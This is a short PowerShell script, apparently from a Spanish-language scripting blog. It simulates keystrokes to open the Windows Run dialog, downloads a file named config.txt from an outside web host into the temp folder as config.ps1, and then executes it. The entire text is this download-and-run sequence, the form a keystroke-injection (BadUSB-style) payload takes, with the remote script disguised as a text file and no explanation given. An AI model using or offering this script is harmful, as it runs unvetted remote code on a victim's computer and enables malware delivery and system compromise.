1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
#Abrir PowerShell [System.Windows.Forms.SendKeys]::SendWait("^({ESC})") [System.Windows.Forms.SendKeys]::SendWait("EJECUTAR") [System.Windows.Forms.SendKeys]::SendWait("{ENTER}") Start-Sleep -Seconds 2 [System.Windows.Forms.SendKeys]::SendWait("powershell Start-BitsTransfer -Source 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config.ps1;") [System.Windows.Forms.SendKeys]::SendWait("{ENTER}") Start-Sleep -Seconds 5 [System.Windows.Forms.SendKeys]::SendWait("^({ESC})") [System.Windows.Forms.SendKeys]::SendWait("EJECUTAR") [System.Windows.Forms.SendKeys]::SendWait("{ENTER}") Start-Sleep -Seconds 5 [System.Windows.Forms.SendKeys]::SendWait("powershell -File $env:TEMP\config.ps1") [System.Windows.Forms.SendKeys]::SendWait("{ENTER}") |